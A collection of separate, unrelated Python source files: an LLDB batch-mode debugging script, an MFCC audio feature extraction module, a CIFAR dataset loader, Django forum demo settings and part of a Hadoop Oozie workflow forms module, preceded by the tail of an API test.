load_site_config()
rsp = self.api_get(get_session_url(local_site.name),
HTTP_AUTHORIZATION='Bearer %s' % token.token,
expected_mimetype=session_mimetype)
self.assertIn('stat', rsp)
self.assertEqual(rsp['stat'], 'ok')
|
|
# Copyright 2014 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
# This script allows one to use LLDB in a way similar to GDB's batch mode. That is, given a text file
# containing LLDB commands (one command per line), this script will execute the commands one after
# the other.
# LLDB also has the -s and -S command-line options, which likewise execute a list of commands from a
# text file. However, those commands are executed `immediately`: a command following a `run` or
# `continue` command is executed right after the `run` or `continue`, without waiting for the next
# breakpoint to be hit. Thus a command sequence like the following will not yield reliable results:
#
# break 11
# run
# print x
#
# Most of the time the `print` command will be executed while the program is still running and will thus
# fail. Using this Python script, the above will work as expected.
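#
# Example invocation (illustrative paths, not from the original script):
#
#     python lldb_batchmode.py ./target/debug/my_binary debug_commands.txt
#
# where debug_commands.txt contains one LLDB command per line, such as the
# break/run/print sequence shown above.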
from __future__ import print_function
import lldb
import os
import sys
import threading
import thread
import re
import atexit
import time
# Set this to True for additional output
DEBUG_OUTPUT = False
def print_debug(s):
"Print something if DEBUG_OUTPUT is True"
global DEBUG_OUTPUT
if DEBUG_OUTPUT:
print("DEBUG: " + str(s))
def normalize_whitespace(s):
"Replace newlines, tabs, multiple spaces, etc with exactly one space"
return re.sub("\s+", " ", s)
# This callback is registered with every breakpoint and makes sure that the frame containing the
# breakpoint location is selected
def breakpoint_callback(frame, bp_loc, dict):
"Called whenever a breakpoint is hit"
print("Hit breakpoint " + str(bp_loc))
# Select the frame and the thread containing it
frame.thread.process.SetSelectedThread(frame.thread)
frame.thread.SetSelectedFrame(frame.idx)
# Returning True means that we actually want to stop at this breakpoint
return True
# This is a list of breakpoints that are not registered with the breakpoint callback. The list is
# populated by the breakpoint listener and checked/emptied whenever a command has been executed
new_breakpoints = []
# This set contains all breakpoint ids that have already been registered with a callback, and is
# used to avoid hooking callbacks into breakpoints more than once
registered_breakpoints = set()
def execute_command(command_interpreter, command):
"Executes a single CLI command"
global new_breakpoints
global registered_breakpoints
res = lldb.SBCommandReturnObject()
print(command)
command_interpreter.HandleCommand(command, res)
if res.Succeeded():
if res.HasResult():
print(normalize_whitespace(res.GetOutput()), end = '\n')
# If the command introduced any breakpoints, make sure to register them with the breakpoint
# callback
while len(new_breakpoints) > 0:
res.Clear()
breakpoint_id = new_breakpoints.pop()
if breakpoint_id in registered_breakpoints:
print_debug("breakpoint with id %s is already registered. Ignoring." % str(breakpoint_id))
else:
print_debug("registering breakpoint callback, id = " + str(breakpoint_id))
callback_command = "breakpoint command add -F breakpoint_callback " + str(breakpoint_id)
command_interpreter.HandleCommand(callback_command, res)
if res.Succeeded():
print_debug("successfully registered breakpoint callback, id = " + str(breakpoint_id))
registered_breakpoints.add(breakpoint_id)
else:
print("Error while trying to register breakpoint callback, id = " + str(breakpoint_id))
else:
print(res.GetError())
def start_breakpoint_listener(target):
"Listens for breakpoints being added and adds new ones to the callback registration list"
listener = lldb.SBListener("breakpoint listener")
def listen():
event = lldb.SBEvent()
try:
while True:
if listener.WaitForEvent(120, event):
if lldb.SBBreakpoint.EventIsBreakpointEvent(event) and \
lldb.SBBreakpoint.GetBreakpointEventTypeFromEvent(event) == \
lldb.eBreakpointEventTypeAdded:
global new_breakpoints
breakpoint = lldb.SBBreakpoint.GetBreakpointFromEvent(event)
print_debug("breakpoint added, id = " + str(breakpoint.id))
new_breakpoints.append(breakpoint.id)
except:
print_debug("breakpoint listener shutting down")
# Start the listener and let it run as a daemon
listener_thread = threading.Thread(target = listen)
listener_thread.daemon = True
listener_thread.start()
# Register the listener with the target
target.GetBroadcaster().AddListener(listener, lldb.SBTarget.eBroadcastBitBreakpointChanged)
def start_watchdog():
"Starts a watchdog thread that will terminate the process after a certain period of time"
watchdog_start_time = time.clock()
watchdog_max_time = watchdog_start_time + 30
def watchdog():
while time.clock() < watchdog_max_time:
time.sleep(1)
print("TIMEOUT: lldb_batchmode.py has been running for too long. Aborting!")
thread.interrupt_main()
# Start the listener and let it run as a daemon
watchdog_thread = threading.Thread(target = watchdog)
watchdog_thread.daemon = True
watchdog_thread.start()
####################################################################################################
# ~main
####################################################################################################
if len(sys.argv) != 3:
print("usage: python lldb_batchmode.py target-path script-path")
sys.exit(1)
target_path = sys.argv[1]
script_path = sys.argv[2]
print("LLDB batch-mode script")
print("----------------------")
print("Debugger commands script is '%s'." % script_path)
print("Target executable is '%s'." % target_path)
print("Current working directory is '%s'" % os.getcwd())
# Start the timeout watchdog
start_watchdog()
# Create a new debugger instance
debugger = lldb.SBDebugger.Create()
# When we step or continue, don't return from the function until the process
# stops. We do this by setting the async mode to false.
debugger.SetAsync(False)
# Create a target from a file and arch
print("Creating a target for '%s'" % target_path)
target_error = lldb.SBError()
target = debugger.CreateTarget(target_path, None, None, True, target_error)
if not target:
print("Could not create debugging target '" + target_path + "': " + str(target_error) +
". Aborting.", file=sys.stderr)
sys.exit(1)
# Register the breakpoint callback for every breakpoint
start_breakpoint_listener(target)
command_interpreter = debugger.GetCommandInterpreter()
try:
script_file = open(script_path, 'r')
for line in script_file:
command = line.strip()
if command == "run" or command == "r" or re.match("^process\s+launch.*", command):
# Before starting to run the program, let the thread sleep a bit, so all
# breakpoint added events can be processed
time.sleep(0.5)
if command != '':
execute_command(command_interpreter, command)
except IOError as e:
print("Could not read debugging script '%s'." % script_path, file = sys.stderr)
print(e, file = sys.stderr)
print("Aborting.", file = sys.stderr)
sys.exit(1)
finally:
script_file.close()
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import librosa
import numpy
import scipy
def feature_extraction_lfcc(audio_filename_with_path, statistics=True):
print audio_filename_with_path
with open(audio_filename_with_path,'r') as f:
feature_matrix = numpy.loadtxt(f)
#f.close()
# Collect into data structure
# print feature_matrix.shape
if statistics:
return {
'feat': feature_matrix,
'stat': {
'mean': numpy.mean(feature_matrix, axis=0),
'std': numpy.std(feature_matrix, axis=0),
'N': feature_matrix.shape[0],
'S1': numpy.sum(feature_matrix, axis=0),
'S2': numpy.sum(feature_matrix ** 2, axis=0),
}
}
else:
return {
'feat': feature_matrix}
def feature_extraction(y, fs=44100, statistics=True, include_mfcc0=True, include_delta=True,
include_acceleration=True, mfcc_params=None, delta_params=None, acceleration_params=None):
"""Feature extraction, MFCC based features
Outputs features in dict, format:
{
'feat': feature_matrix [shape=(frame count, feature vector size)],
'stat': {
'mean': numpy.mean(feature_matrix, axis=0),
'std': numpy.std(feature_matrix, axis=0),
'N': feature_matrix.shape[0],
'S1': numpy.sum(feature_matrix, axis=0),
'S2': numpy.sum(feature_matrix ** 2, axis=0),
}
}
Parameters
----------
y: numpy.array [shape=(signal_length, )]
Audio
fs: int > 0 [scalar]
Sample rate
(Default value=44100)
statistics: bool
Calculate feature statistics for extracted matrix
(Default value=True)
include_mfcc0: bool
Include 0th MFCC coefficient into static coefficients.
(Default value=True)
include_delta: bool
Include delta MFCC coefficients.
(Default value=True)
include_acceleration: bool
Include acceleration MFCC coefficients.
(Default value=True)
mfcc_params: dict or None
Parameters for extraction of static MFCC coefficients.
delta_params: dict or None
Parameters for extraction of delta MFCC coefficients.
acceleration_params: dict or None
Parameters for extraction of acceleration MFCC coefficients.
Returns
-------
result: dict
Feature dict
"""
eps = numpy.spacing(1)
# Windowing function
if mfcc_params['window'] == 'hamming_asymmetric':
window = scipy.signal.hamming(mfcc_params['n_fft'], sym=False)
elif mfcc_params['window'] == 'hamming_symmetric':
window = scipy.signal.hamming(mfcc_params['n_fft'], sym=True)
elif mfcc_params['window'] == 'hann_asymmetric':
window = scipy.signal.hann(mfcc_params['n_fft'], sym=False)
elif mfcc_params['window'] == 'hann_symmetric':
window = scipy.signal.hann(mfcc_params['n_fft'], sym=True)
else:
window = None
# Calculate Static Coefficients
magnitude_spectrogram = numpy.abs(librosa.stft(y + eps,
n_fft=mfcc_params['n_fft'],
win_length=mfcc_params['win_length'],
hop_length=mfcc_params['hop_length'],
center=True,
window=window)) ** 2
mel_basis = librosa.filters.mel(sr=fs,
n_fft=mfcc_params['n_fft'],
n_mels=mfcc_params['n_mels'],
fmin=mfcc_params['fmin'],
fmax=mfcc_params['fmax'],
htk=mfcc_params['htk'])
mel_spectrum = numpy.dot(mel_basis, magnitude_spectrogram)
mfcc = librosa.feature.mfcc(S=librosa.logamplitude(mel_spectrum),
n_mfcc=mfcc_params['n_mfcc'])
# Collect the feature matrix
feature_matrix = mfcc
if include_delta:
# Delta coefficients
mfcc_delta = librosa.feature.delta(mfcc, **delta_params)
# Add Delta Coefficients to feature matrix
feature_matrix = numpy.vstack((feature_matrix, mfcc_delta))
if include_acceleration:
        # Acceleration coefficients (aka delta-delta)
mfcc_delta2 = librosa.feature.delta(mfcc, order=2, **acceleration_params)
# Add Acceleration Coefficients to feature matrix
feature_matrix = numpy.vstack((feature_matrix, mfcc_delta2))
if not include_mfcc0:
# Omit mfcc0
feature_matrix = feature_matrix[1:, :]
feature_matrix = feature_matrix.T
# Collect into data structure
if statistics:
return {
'feat': feature_matrix,
'stat': {
'mean': numpy.mean(feature_matrix, axis=0),
'std': numpy.std(feature_matrix, axis=0),
'N': feature_matrix.shape[0],
'S1': numpy.sum(feature_matrix, axis=0),
'S2': numpy.sum(feature_matrix ** 2, axis=0),
}
}
else:
return {
'feat': feature_matrix}
class FeatureNormalizer(object):
"""Feature normalizer class
Accumulates feature statistics
Examples
--------
>>> normalizer = FeatureNormalizer()
>>> for feature_matrix in training_items:
>>> normalizer.accumulate(feature_matrix)
>>>
>>> normalizer.finalize()
>>> for feature_matrix in test_items:
>>> feature_matrix_normalized = normalizer.normalize(feature_matrix)
    >>> # use the features
"""
def __init__(self, feature_matrix=None):
"""__init__ method.
Parameters
----------
feature_matrix : numpy.ndarray [shape=(frames, number of feature values)] or None
Feature matrix to be used in the initialization
"""
if feature_matrix is None:
self.N = 0
self.mean = 0
self.S1 = 0
self.S2 = 0
self.std = 0
else:
self.mean = numpy.mean(feature_matrix, axis=0)
self.std = numpy.std(feature_matrix, axis=0)
self.N = feature_matrix.shape[0]
self.S1 = numpy.sum(feature_matrix, axis=0)
self.S2 = numpy.sum(feature_matrix ** 2, axis=0)
self.finalize()
def __enter__(self):
# Initialize Normalization class and return it
self.N = 0
self.mean = 0
self.S1 = 0
self.S2 = 0
self.std = 0
return self
def __exit__(self, type, value, traceback):
# Finalize accumulated calculation
self.finalize()
def accumulate(self, stat):
"""Accumalate statistics
Input is statistics dict, format:
{
'mean': numpy.mean(feature_matrix, axis=0),
'std': numpy.std(feature_matrix, axis=0),
'N': feature_matrix.shape[0],
'S1': numpy.sum(feature_matrix, axis=0),
'S2': numpy.sum(feature_matrix ** 2, axis=0),
}
Parameters
----------
stat : dict
Statistics dict
Returns
-------
nothing
"""
self.N += stat['N']
self.mean += stat['mean']
self.S1 += stat['S1']
self.S2 += stat['S2']
def finalize(self):
"""Finalize statistics calculation
Accumulated values are used to get mean and std for the seen feature data.
Parameters
----------
nothing
Returns
-------
nothing
"""
# Finalize statistics
self.mean = self.S1 / self.N
self.std = numpy.sqrt((self.N * self.S2 - (self.S1 * self.S1)) / (self.N * (self.N - 1)))
        # In case of degenerate (constant) feature material std becomes NaN => replace with 0.0
self.std = numpy.nan_to_num(self.std)
self.mean = numpy.reshape(self.mean, [1, -1])
self.std = numpy.reshape(self.std, [1, -1])
def normalize(self, feature_matrix):
"""Normalize feature matrix with internal statistics of the class
Parameters
----------
feature_matrix : numpy.ndarray [shape=(frames, number of feature values)]
Feature matrix to be normalized
Returns
-------
feature_matrix : numpy.ndarray [shape=(frames, number of feature values)]
Normalized feature matrix
"""
return (feature_matrix - self.mean) / self.std
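# A self-contained usage sketch (not part of the original module): accumulate
# statistics over a few synthetic feature matrices and normalize one of them.
# In real use the 'stat' dicts returned by feature_extraction() would be passed
# to accumulate() instead of the hand-built dicts below.
if __name__ == '__main__':
    rng = numpy.random.RandomState(0)
    training_matrices = [rng.rand(100, 20) for _ in range(3)]
    normalizer = FeatureNormalizer()
    for matrix in training_matrices:
        normalizer.accumulate({
            'mean': numpy.mean(matrix, axis=0),
            'std': numpy.std(matrix, axis=0),
            'N': matrix.shape[0],
            'S1': numpy.sum(matrix, axis=0),
            'S2': numpy.sum(matrix ** 2, axis=0),
        })
    normalizer.finalize()
    normalized = normalizer.normalize(training_matrices[0])
    print(numpy.mean(normalized, axis=0))  # roughly zero mean after normalization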
|
|
# -*- coding: utf-8 -*-
# File: cifar.py
# Yukun Chen <cykustc@gmail.com>
import numpy as np
import os
import pickle
import tarfile
from ...utils import logger
from ...utils.fs import download, get_dataset_path
from ..base import RNGDataFlow
__all__ = ['CifarBase', 'Cifar10', 'Cifar100']
DATA_URL_CIFAR_10 = ('http://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz', 170498071)
DATA_URL_CIFAR_100 = ('http://www.cs.toronto.edu/~kriz/cifar-100-python.tar.gz', 169001437)
def maybe_download_and_extract(dest_directory, cifar_classnum):
"""Download and extract the tarball from Alex's website. Copied from tensorflow example """
assert cifar_classnum == 10 or cifar_classnum == 100
if cifar_classnum == 10:
cifar_foldername = 'cifar-10-batches-py'
else:
cifar_foldername = 'cifar-100-python'
if os.path.isdir(os.path.join(dest_directory, cifar_foldername)):
logger.info("Found cifar{} data in {}.".format(cifar_classnum, dest_directory))
return
else:
DATA_URL = DATA_URL_CIFAR_10 if cifar_classnum == 10 else DATA_URL_CIFAR_100
filename = DATA_URL[0].split('/')[-1]
filepath = os.path.join(dest_directory, filename)
download(DATA_URL[0], dest_directory, expect_size=DATA_URL[1])
tarfile.open(filepath, 'r:gz').extractall(dest_directory)
def read_cifar(filenames, cifar_classnum):
assert cifar_classnum == 10 or cifar_classnum == 100
ret = []
for fname in filenames:
fo = open(fname, 'rb')
dic = pickle.load(fo, encoding='bytes')
data = dic[b'data']
if cifar_classnum == 10:
label = dic[b'labels']
IMG_NUM = 10000 # cifar10 data are split into blocks of 10000
else:
label = dic[b'fine_labels']
IMG_NUM = 50000 if 'train' in fname else 10000
fo.close()
for k in range(IMG_NUM):
img = data[k].reshape(3, 32, 32)
img = np.transpose(img, [1, 2, 0])
ret.append([img, label[k]])
return ret
def get_filenames(dir, cifar_classnum):
assert cifar_classnum == 10 or cifar_classnum == 100
if cifar_classnum == 10:
train_files = [os.path.join(
dir, 'cifar-10-batches-py', 'data_batch_%d' % i) for i in range(1, 6)]
test_files = [os.path.join(
dir, 'cifar-10-batches-py', 'test_batch')]
meta_file = os.path.join(dir, 'cifar-10-batches-py', 'batches.meta')
elif cifar_classnum == 100:
train_files = [os.path.join(dir, 'cifar-100-python', 'train')]
test_files = [os.path.join(dir, 'cifar-100-python', 'test')]
meta_file = os.path.join(dir, 'cifar-100-python', 'meta')
return train_files, test_files, meta_file
def _parse_meta(filename, cifar_classnum):
with open(filename, 'rb') as f:
obj = pickle.load(f)
return obj['label_names' if cifar_classnum == 10 else 'fine_label_names']
class CifarBase(RNGDataFlow):
"""
Produces [image, label] in Cifar10/100 dataset,
image is 32x32x3 in the range [0,255].
label is an int.
"""
def __init__(self, train_or_test, shuffle=None, dir=None, cifar_classnum=10):
"""
Args:
train_or_test (str): 'train' or 'test'
shuffle (bool): defaults to True for training set.
dir (str): path to the dataset directory
cifar_classnum (int): 10 or 100
"""
assert train_or_test in ['train', 'test']
assert cifar_classnum == 10 or cifar_classnum == 100
self.cifar_classnum = cifar_classnum
if dir is None:
dir = get_dataset_path('cifar{}_data'.format(cifar_classnum))
maybe_download_and_extract(dir, self.cifar_classnum)
train_files, test_files, meta_file = get_filenames(dir, cifar_classnum)
if train_or_test == 'train':
self.fs = train_files
else:
self.fs = test_files
for f in self.fs:
if not os.path.isfile(f):
raise ValueError('Failed to find file: ' + f)
self._label_names = _parse_meta(meta_file, cifar_classnum)
self.train_or_test = train_or_test
self.data = read_cifar(self.fs, cifar_classnum)
self.dir = dir
if shuffle is None:
shuffle = train_or_test == 'train'
self.shuffle = shuffle
def __len__(self):
return 50000 if self.train_or_test == 'train' else 10000
def __iter__(self):
idxs = np.arange(len(self.data))
if self.shuffle:
self.rng.shuffle(idxs)
for k in idxs:
# since cifar is quite small, just do it for safety
yield self.data[k]
def get_per_pixel_mean(self, names=('train', 'test')):
"""
Args:
names (tuple[str]): the names ('train' or 'test') of the datasets
Returns:
a mean image of all images in the given datasets, with size 32x32x3
"""
for name in names:
assert name in ['train', 'test'], name
train_files, test_files, _ = get_filenames(self.dir, self.cifar_classnum)
all_files = []
if 'train' in names:
all_files.extend(train_files)
if 'test' in names:
all_files.extend(test_files)
all_imgs = [x[0] for x in read_cifar(all_files, self.cifar_classnum)]
arr = np.array(all_imgs, dtype='float32')
mean = np.mean(arr, axis=0)
return mean
def get_label_names(self):
"""
Returns:
[str]: name of each class.
"""
return self._label_names
def get_per_channel_mean(self, names=('train', 'test')):
"""
Args:
names (tuple[str]): the names ('train' or 'test') of the datasets
Returns:
An array of three values as mean of each channel, for all images in the given datasets.
"""
mean = self.get_per_pixel_mean(names)
return np.mean(mean, axis=(0, 1))
class Cifar10(CifarBase):
"""
Produces [image, label] in Cifar10 dataset,
image is 32x32x3 in the range [0,255].
label is an int.
"""
def __init__(self, train_or_test, shuffle=None, dir=None):
"""
Args:
train_or_test (str): either 'train' or 'test'.
shuffle (bool): shuffle the dataset, default to shuffle in training
"""
super(Cifar10, self).__init__(train_or_test, shuffle, dir, 10)
class Cifar100(CifarBase):
""" Similar to Cifar10"""
def __init__(self, train_or_test, shuffle=None, dir=None):
super(Cifar100, self).__init__(train_or_test, shuffle, dir, 100)
if __name__ == '__main__':
ds = Cifar10('train')
mean = ds.get_per_channel_mean()
print(mean)
import cv2
ds.reset_state()
for i, dp in enumerate(ds):
if i == 100:
break
img = dp[0]
cv2.imwrite("{:04d}.jpg".format(i), img)
|
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django.core.urlresolvers import reverse_lazy
from unipath import Path
from machina import get_apps as get_machina_apps
from machina import MACHINA_MAIN_STATIC_DIR
from machina import MACHINA_MAIN_TEMPLATE_DIR
PROJECT_PATH = Path(__file__).ancestor(3)
# APP CONFIGURATION
# ------------------------------------------------------------------------------
INSTALLED_APPS = [
# Django apps
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.sitemaps',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
# Third party apps
'mptt',
'haystack',
'widget_tweaks',
'ckeditor',
] + get_machina_apps([
'demo.apps.forum_conversation',
'demo.apps.forum_member',
])
# MIGRATION CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'forum_conversation': 'machina.apps.forum_conversation.migrations',
'forum_member': 'machina.apps.forum_member.migrations',
}
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.gzip.GZipMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# Machina
'machina.apps.forum_permission.middleware.ForumPermissionMiddleware',
)
# DEBUG CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = False
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': PROJECT_PATH.child('test.db'),
}
}
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'EST'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#languages
LANGUAGES = (
('en', 'English'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#locale-paths
LOCALE_PATHS = (
PROJECT_PATH.child('demo_project', 'locale'),
)
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = 'NOTSECRET'
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': (
PROJECT_PATH.child('demo', 'templates'),
MACHINA_MAIN_TEMPLATE_DIR,
),
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
# Machina
'machina.core.context_processors.metadata',
],
'loaders': [
('django.template.loaders.cached.Loader', (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)),
]
},
},
]
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = PROJECT_PATH.child('public', 'static')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
MACHINA_MAIN_STATIC_DIR,
PROJECT_PATH.child('demo', 'static', 'build'),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-STATICFILES_STORAGE
STATICFILES_STORAGE = 'django.contrib.staticfiles.storage.ManifestStaticFilesStorage'
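# Note: ManifestStaticFilesStorage resolves hashed filenames from the manifest written
# by "collectstatic", so that command has to be run before serving this project with
# DEBUG = False, otherwise static lookups will fail.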
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = PROJECT_PATH.child('public', 'media')
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL CONFIGURATION
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'demo_project.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'wsgi.application'
# ADMIN CONFIGURATION
# ------------------------------------------------------------------------------
# URL of the admin page
ADMIN_URL = 'admin/'
# AUTH CONFIGURATION
# ------------------------------------------------------------------------------
LOGIN_URL = reverse_lazy('login')
# CACHE CONFIGURATION
# ------------------------------------------------------------------------------
# Attachment cache backend
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'machina_attachments': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': '/tmp',
}
}
# CKEDITOR CONFIGURATION
# ------------------------------------------------------------------------------
CKEDITOR_CONFIGS = {
'default': {
'toolbar': 'Custom',
'toolbar_Custom': [
{'name': 'clipboard', 'items': ['Undo', 'Redo', ]},
{'name': 'insert', 'items': ['Image', 'Table', 'HorizontalRule', 'Smiley',
'SpecialChar', 'PageBreak', ]},
{'name': 'styles', 'items': ['Styles', 'Format', ]},
{'name': 'basicstyles', 'items': ['Bold', 'Italic', 'Strike', '-', 'RemoveFormat', ]},
{'name': 'paragraph', 'items': ['NumberedList', 'BulletedList', '-', 'Outdent',
'Indent', '-', 'Blockquote', ]},
{'name': 'links', 'items': ['Link', 'Unlink', 'Anchor', ]},
{'name': 'tools', 'items': ['Maximize', ]},
],
}
}
# HAYSTACK CONFIGURATION
# ------------------------------------------------------------------------------
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_backend.WhooshEngine',
'PATH': PROJECT_PATH.child('whoosh_index'),
},
}
# MACHINA SETTINGS
# ------------------------------------------------------------------------------
MACHINA_DEFAULT_AUTHENTICATED_USER_FORUM_PERMISSIONS = [
'can_see_forum',
'can_read_forum',
'can_start_new_topics',
'can_reply_to_topics',
'can_edit_own_posts',
'can_post_without_approval',
'can_create_polls',
'can_vote_in_polls',
'can_download_file',
]
MACHINA_MARKUP_LANGUAGE = None
MACHINA_MARKUP_WIDGET = 'ckeditor.widgets.CKEditorWidget'
|
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from datetime import datetime, timedelta
from django import forms
from django.db.models import Q
from django.core.exceptions import ValidationError
from django.forms.widgets import TextInput
from django.utils.functional import curry
from django.utils.translation import ugettext as _, ugettext_lazy as _t
from desktop.lib.django_forms import MultiForm, SplitDateTimeWidget
from oozie.models import Workflow, Node, Java, Mapreduce, Streaming, Coordinator,\
Dataset, DataInput, DataOutput, Pig, Link, Hive, Sqoop, Ssh, Shell, DistCp, Fs,\
Email, SubWorkflow, Generic, Bundle, BundledCoordinator
LOG = logging.getLogger(__name__)
class ParameterForm(forms.Form):
name = forms.CharField(max_length=40, widget=forms.widgets.HiddenInput())
value = forms.CharField(max_length=1024, required=False)
NON_PARAMETERS = (
'user.name',
'oozie.wf.rerun.failnodes',
'oozie.wf.rerun.skip.nodes',
'oozie.wf.application.path',
'oozie.coord.application.path',
'oozie.bundle.application.path',
'mapreduce.job.user.name',
'wf_application_path',
'jobTracker',
'nameNode',
'hue-id-w',
'hue-id-c',
'hue-id-b',
)
@staticmethod
def get_initial_params(conf_dict):
params = filter(lambda key: key not in ParameterForm.NON_PARAMETERS, conf_dict.keys())
return [{'name': name, 'value': conf_dict[name]} for name in params]
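# Illustrative sketch (hypothetical values): for a submission conf such as
#   {'user.name': 'hue', 'oozie.wf.application.path': '/deployed/wf', 'market': 'US'}
# every reserved key listed in NON_PARAMETERS is dropped, so get_initial_params()
# would return [{'name': 'market', 'value': 'US'}], ready to seed a ParameterForm formset.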
class WorkflowForm(forms.ModelForm):
class Meta:
model = Workflow
exclude = ('owner', 'start', 'end')
widgets = {
'description': forms.TextInput(attrs={'class': 'span5'}),
'deployment_dir': forms.TextInput(attrs={'class': 'pathChooser span7'}),
'parameters': forms.widgets.HiddenInput(),
'job_xml': forms.widgets.TextInput(attrs={'class': 'pathChooser span7'}),
'job_properties': forms.widgets.HiddenInput(),
'schema_version': forms.widgets.HiddenInput(),
}
def __init__(self, *args, **kwargs):
super(WorkflowForm, self).__init__(*args, **kwargs)
SCHEMA_VERSION_CHOICES = ['0.4']
class ImportWorkflowForm(WorkflowForm):
definition_file = forms.FileField(label=_t("Local workflow.xml file"))
resource_archive = forms.FileField(label=_t("Workflow resource archive (zip)"), required=False)
class ImportJobsubDesignForm(forms.Form):
"""Used for specifying what oozie actions to import"""
def __init__(self, choices=[], *args, **kwargs):
super(ImportJobsubDesignForm, self).__init__(*args, **kwargs)
self.fields['jobsub_id'] = forms.ChoiceField(choices=choices, widget=forms.RadioSelect(attrs={'class':'radio'}))
class NodeForm(forms.ModelForm):
class Meta:
ALWAYS_HIDE = ('workflow', 'children', 'node_type')
model = Node
exclude = ALWAYS_HIDE
class NodeMetaForm(forms.ModelForm):
class Meta:
ALWAYS_HIDE = ('workflow', 'children', 'node_type')
model = Node
exclude = ALWAYS_HIDE + ('name', 'description')
class JavaForm(forms.ModelForm):
class Meta:
model = Java
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
'files': forms.HiddenInput(),
'archives': forms.HiddenInput(),
'jar_path': forms.TextInput(attrs={'class': 'pathChooser span5'}),
'description': forms.TextInput(attrs={'class': 'span5'}),
'main_class': forms.TextInput(attrs={'class': 'span5'}),
'args': forms.TextInput(attrs={'class': 'span5'}),
'java_opts': forms.TextInput(attrs={'class': 'span5'}),
'job_xml': forms.TextInput(attrs={'class': 'span5'}),
}
class MapreduceForm(forms.ModelForm):
"""Used for specifying a mapreduce action"""
class Meta:
model = Mapreduce
exclude = NodeForm.Meta.ALWAYS_HIDE
widgets = {
'job_properties': forms.widgets.HiddenInput(),
'prepares': forms.widgets.HiddenInput(),
